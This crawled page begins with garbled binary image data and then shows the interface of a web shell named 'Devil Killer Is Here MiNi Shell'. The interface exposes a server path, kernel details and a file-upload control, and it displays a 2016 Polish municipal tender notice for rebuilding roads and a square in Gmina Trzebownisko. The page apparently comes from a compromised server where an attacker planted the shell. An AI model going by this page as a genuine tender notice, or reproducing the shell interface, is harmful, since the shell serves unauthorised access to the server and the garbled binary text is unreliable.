JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160407/80856-N-2016.html

<p class="kh_header"><b>Trzebownisko: Przebudowa siedmiu odcinków dróg gminnych oraz placu komunalnego na terenie Gminy Trzebownisko</b><br>
<b>Numer ogłoszenia: 80856 - 2016; data zamieszczenia: 07.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Trzebownisko , Trzebownisko 976, 36-001 Trzebownisko, woj. podkarpackie, tel. 017 7713700, faks 017 7713719.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trzebownisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa siedmiu odcinków dróg gminnych oraz placu komunalnego na terenie Gminy Trzebownisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)przebudowa drogi wewnętrznej składającej się z działki Nr ewid. 3913 i części działki Nr ewid. 3947 w Łące, Droga objęta przebudową została urządzona w ramach prac poscaleniowych. Istniejącą przebudowę należy wyprofilować klińcem średnio 5 cm oraz na zjeździe z drogi gminnej Nr 108837 na pow. 56 m2 należy uzupełnić podbudowę tłuczniem zaklinowanego klińcem warstwa o grubości 15 cm po zagęszczeniu. Na takim podłożu należy wykonać warstwę wiążącą z asfaltobetonu grubości 4 cm po zagęszczeniu. Szerokość jezdni 4 m przy zjeździe z drogi gminnej 10 m. Po obu stronach drogi zostaną wykonane pobocza na całej długości i szerokości po 0,7m. Na odcinku około 40 m należy odmulić rów.  
b) przebudowa odcinka drogi wewnętrznej oznaczonej jako działka Nr 43 w Nowej Wsi, Początek drogi to zjazd z drogi powiatowej Nr 1376 pod którym należy przebudować przepust o średnicy O40, wykonać przyczółki wylewane na mokro lub prefabrykowane. Po lewej stronie drogi należy wykarczować zakrzaczenia i wykonać koryto o głębokości około 35 cm pod poszerzenie i przedłużeniu na 13m jak i pod korytko ściekowe z korytek betonowych typu najazdowego. Na poszerzeniu i przedłużeniu jezdni należy wykonać podbudowę z tłucznia zaklinowanego klińcem, grubość warstwy po zagęszczeniu 25 cm.
Korytka betonowe typu najazdowego ułożyć na podbudowie z mieszanki betonowej grubość 20 cm, wody z cieku z korytek będą odprowadzane do rowu przydrożnego przy drodze powiatowej, którą też należy umocnić korytkami betonowymi na długości 10 mb o wysokości boku około 25 cm. Po wykonaniu mechanicznego profilowania istniejącej nawierzchni wykonać warstwę wiążącą z asfaltobetonu, grubość warstwy po zagęszczeniu 4 cm i warstwę wiążącą o grubości 4 cm z mieszanki mineralno-bitumicznej. 
c) przebudowa części drogi oznaczonej jako działka Nr ewid. 1016 w Nowej Wsi, Droga objęta przebudową rozpoczyna się zjazdem z drogi gminnej Nr 108829. W celu nawiązania się do istniejącej niwelety na drodze Nr 108829 należy wykonać frezowanie istniejącego zjazdu na łącznej powierzchni 110 m2. Przy bramie wjazdowej do OSiR na długości 40 m przy istniejącym chodniku wykonać koryto o głębokości 30 cm i podbudowie z tłucznia zaklinowanego klińcem. Po lewej stronie od istniejącego asfaltowego zjazdu do bramy wjazdowej do OSiR wykonać ciek z korytek betonowych typu najazdowego ze spadkiem w kierunku istniejącej kratki ściekowej na ciągu pieszym na terenie OSiR. Na całej powierzchni należy wykonać profilowanie klińcem średnio 5 cm w celu zapewnienia spadków w kierunku cieku z korytek betonowych. Na tak przygotowanym podłożu należy wykonać warstwę wiążącą z asfaltobetonu, grubość 4 cm po zagęszczeniu oraz warstwę ścieralną z mieszanki mineralno-bitumicznej, grubość 4 cm po zagęszczeniu. Po lewej stronie drogi wykonać pobocze z klińca grubość warstwy 8 cm po zagęszczeniu. Studzienki kanalizacyjne wyregulować do poziomu nawierzchni, wskazanego po wykonaniu nawierzchni ścieralnej. Ścięcie poboczy dotyczy drogi gminnej Nr 108828 od skrzyżowania z drogą wojewódzką 878 do zjazdu na przedmiotową drogę. 
d)przebudowa placu komunalnego na działce Nr ewid. 1074 w Nowej Wsi, Istniejący plac jest częściowo wyasfaltowany na wyjeździe z bramy garażu OSP wystąpiło znaczne zaniżenie (wybój) w nawierzchni asfaltowej, dlatego tez planuje się wyciąć prostokąt o wymiarach 8 x 3m, wykonać koryto o głębokości około 35 cm, następnie na tej powierzchni wykonać podbudowę z tłucznia zaklinowanego klińcem, grubość warstwy po zagęszczeniu 30 cm i na tej podbudowie wykonać warstwę z asfaltobetonu oraz warstwę wiążącą. Również na istniejącej nawierzchni z materiału kamiennego wykonać koryto na pow. o wymiarach 13x14 m i 34x2, należy również ułożyć nawierzchnie asfaltową (warstwa wiążąca i ścieralna) na podbudowie z tłucznia zaklinowanego klińcem. 
e) przebudowa drogi wewnętrznej oznaczonej jako działka nr ewid. 2086 w Stobiernej, Początek drogi jest na zjeździe z drogi wojewódzkiej Nr 878, a początek robót od przepustu pod zjazdem.  Droga na dzień dzisiejszy posiada nawierzchnie z kamienia łupanego oraz kory asfaltowej  w złym stanie technicznym. Istniejącą nawierzchnię należy wyprofilować średnio 5-10 cm z odwozem urobku w miejsce wskazane przez zamawiającego. Po lewej stronie należy wykonać ciek z korytek betonowych typu najazdowego na podkładzie betonowym o grubości 20 cm. Wody opadowe z cieku betonowego będą odprowadzane do studzienki z kratą. Studzienka zostanie włączona przykanalikiem O200 do przepustu, który będzie przebudowany pod zjazdem na drogę gminną 108807. W środku drogi rośnie świerk, który jest przeznaczony do wycinki i wykarczowania (decyzja po stronie zamawiającego). Po mechanicznym profilowaniu podłoża tj. uzyskanie odpowiedniej niwelety i spadku jednostronnego w kierunku cieku z korytek betonowych należy wykonać profilowanie klińcem średnia grubość 5cm. Na takim podłożu zostanie wykonana warstwa wiążąca z asfaltobetonu o grubości 4 cm i warstwa ścieralna o grubości 4 cm. Przy przebudowywanym przepuście należy uzupełnić podbudowę z tłucznia zaklinowanego klińcem warstwą 25 cm po zagęszczeniu. Po prawej stronie należy wykonać pobocze z klińca grubość warstwy 8 cm po zagęszczeniu. Rów przy drodze gminnej Nr 108807 od wylotu z przebudowanego przepustu do wlotu do rowu melioracyjnego należy umocnić korytkami betonowymi o wysokości boku 23-25 cm. 
f) przebudowa drogi wewnętrznej oznaczonej jako działka Nr ewid. 4270/1 w Stobiernej, Droga przewidziana do remontu posiada nawierzchnię z tłucznia zaklinowanego klińcem. Zjazd na drogę wewnętrzną jest z drogi wojewódzkiej Nr 878 po lewej stronie, przy zjeździe jest kratka ściekowa do której zostanie odprowadzona woda z cieku i korytek betonowych po prawej stronie drogi. W celu wykonania cieku należy wykonać koryto o głębokości średnio 30 cm i ułożyć korytka na podbudowie z mieszanki betonowej grubość 20 cm. Przed położeniem nawierzchni asfaltowej należy wykonać profilowanie mechanicznie istniejącej nawierzchni oraz w celu zapewnienia prawidłowego spadku miejscowo wykonać profilowanie klińcem na pow. około 120 m2. Woda z korytek zostanie odprowadzona do istniejącej kratki ściekowej poprzez wykonanie dodatkowej studzienki z przykanalikiem do istniejącej studzienki. Ponadto należy wykonać regulacje studzienek kanalizacji sanitarnej.
g) przebudowa drogi wewnętrznej oznaczonej jako działka Nr ewid. 488/6 oraz części działek 417/2 i 486/3 w Trzebownisku, Droga wewnętrzna posiada połączenie z drogą powiatową Nr 1383 poprzez zjazd w chodniku. W celu zapewnienia niwelety ze spadkiem w kierunku drogi powiatowej należy wykonać mechaniczne profilowanie na całej długości z odwozem urobku w miejsc wskazane przez zamawiającego. Następnie wykonać profilowanie klińcem na całej powierzchni średnia grubość warstwy 5 cm. W celu odprowadzenia wód opadowych zakłada się wykonanie cieku z korytek betonowych typu najazdowego o długości 210 mb. Wody z cieku będą odprowadzane do studzienek z kratą, jedna przy istniejącym włączeniu do kolektora pod chodnikiem, a druga w odległości 30 mb od zjazdy poprzez kolektor O200 do studzienki przy chodniku. Na tak przygotowanym podłożu wykonać warstwę wiążącą z asfaltobetonu grubość po zagęszczeniu 4 cm i warstwę ścieralną z mieszanki mineralno-bitumicznej grubości 4 cm. Korytko ściekowe typu najazdowego ułożyć na podbudowie betonowej grubość 20 cm. Na wysokości budynku 102 D-102 C wykonać zjazd o powierzchni 75 m2 na podbudowie z tłucznia zaklinowanego klińcem grubość warstwy 20 cm oraz warstwy wiążącej i ścieralnej. Po prawej stronie wykonać pobocze z klińca grubość warstwy po zawałowaniu 8 cm na pow. 100m2
h)przebudowa drogi wewnętrznej oznaczonej jako działka Nr ewid. 224/11 w Trzebownisku, Przedmiotowa droga posiada zjazd z byłej drogi powiatowej Nr 1383, pod którym należy przebudować przepust O 300 m o długości 10 mb z przyczółkami. Na całej długości drogi z wyłączeniem jednego wjazdu należy wykonać poszerzenie średnio o 1,0 m. W tym celu należy wykonać koryto o głębokości 30 cm na pow. 246 m2, następnie podbudowę z tłucznia zaklinowanego klińcem grubość warstwy po zagęszczeniu 25 cm. Na całej powierzchni należy wykonać profilowanie klińcem grubość warstwy po zawałowaniu 5 cm. Następnie zostanie wykonana warstwa wiążąca z asfaltobetonu i warstwa ścieralna grubości 4 cm. Na odcinku od wjazdu do poprzecznej drogi należy wykonać pobocze prawostronne o szerokości 1 m z klińca po zagęszczeniu grubość warstwy 13 cm. Na odcinku prostopadłym do wjazdu pobocze obustronne o szerokości 0,75 m po zagęszczeniu grubość warstwy 13 cm. Przy przepuście pod zjazdem odmulić rowy po obu stronach zjazdu.
Przedmiary robót zostały w/w dróg stanowią załączniki do SIWZ-przedmiary należy traktować jako materiał pomocniczy.
Ponadto zakres zamówienia obejmuje inne niezbędne do zrealizowania zamówienia roboty towarzyszące podstawowemu zakresowi robót nie ujęte w przedmiarach i SIWZ, a bez których nie można wykonać zamówienia. 
Jeżeli opis przedmiotu zamówienia wskazuje w odniesieniu do niektórych materiałów i urządzeń znaki towarowe lub pochodzenie, Zamawiający zgodnie z art.29 ust.3 ustawy Pzp, dopuszcza składanie produktów równoważnych. Wszelkie produkty pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. 
Zamawiający dopuszcza jedynie produkty równoważne o parametrach jakościowych i cechach użytkowych, co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia. Będą one podlegały ocenie autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierównoważności.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 10 000zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówienie lub zamówienia polegające na budowaniu dróg, chodników, placów lub wykonywaniu przebudów dróg o wartości nie mniejszej niż 500 000,00 zł brutto każda.
Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez załączenie dowodów potwierdzających czy roboty zostały wykonane w sposób należyty oraz wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował osobą która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń i która:
- pełniła funkcję kierownika budowy lub kierownika robót przy realizacji robót drogowych polegających na budowie lub przebudowie dróg o wartości co najmniej 500 000 zł i posiada doświadczenie zawodowe - minimum trzy lata</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy potwierdzą posiadanie środków finansowych lub zdolność kredytową w wysokości 5000000,00 zł, pozwalającej zrealizować przedmiot zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Pod pojęciem najważniejszych robót Zamawiający rozumie roboty polegające na budowaniu dróg, chodników, placów lub wykonywaniu przebudów dróg o wartości nie mniejszej niż 500 000,00 zł brutto każda;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty stanowiący załącznik Nr 1 do SIWZ
2.	Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Gwarancja - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy stanowi załącznik nr 2 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
